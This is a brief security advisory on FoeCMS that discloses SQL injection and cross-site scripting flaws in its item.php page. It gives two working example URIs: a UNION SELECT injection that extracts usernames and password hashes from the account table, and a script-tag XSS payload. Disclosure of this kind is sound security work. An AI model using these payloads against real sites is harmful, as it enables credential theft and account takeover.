FoeCMS Cross Site Scripting and SQL Injection Vulnerabilities

FoeCMS Cross Site Scripting and SQL Injection Vulnerabilities

An attacker can use a browser to exploit these issues. To exploit the cross-site scripting issue an attacker must trick an unsuspecting victim into following a malicious URI to exploit these issues.

The following example URIs are available:

SQL-injection:

http://www.example.com/[path]/item.php?ei=-1 union select 1,username,pass_sha,1,1,1,1,1,1 from foe_account--

Cross-site scripting:

http://www.example.com/[path]/item.php?ei=<script>alert(1)</script>